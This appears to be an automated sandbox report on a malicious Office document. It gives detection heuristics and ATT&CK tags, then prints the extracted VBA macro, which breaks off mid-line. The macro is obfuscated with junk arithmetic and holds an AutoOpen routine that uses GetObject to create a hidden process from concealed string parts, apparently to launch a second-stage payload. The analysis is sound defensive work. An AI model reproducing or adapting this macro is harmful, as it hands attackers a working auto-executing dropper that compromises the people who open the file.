MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that uses the GetObject function. This indicates an attempt to execute arbitrary code as soon as the document is opened. The VBA code is heavily obfuscated, padded with junk arithmetic expressions that serve no functional purpose, but the GetObject call is a clear indicator of malicious intent, most likely used to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (6)
- ClamAV: Doc.Malware.Sagent-6902893-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16486 bytes |

SHA-256: 44f51f301e4d99f0b6ab421f6b024d0bc312db60cd5a2009bd2f2ce305e84dfb

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
If mAAAcA = oCABAxA Then
lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
If OwAAGD4_ = pAADBB Then
VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
If loZ1AQ = nxXQBkAA Then
rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
If jBxAoCUD = c4AAoDZX Then
qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
If jAooQAA = T4AA4B Then
ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
If jQQwoA = LQxBAQB Then
oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
If jAAoAx = lAA1AXGA Then
OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
If u1AAcA = nBB_UA Then
k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
If pXUXABkQ = pDGXcw4 Then
SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
If sABo4Q = dC4UD1A Then
cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
... (truncated)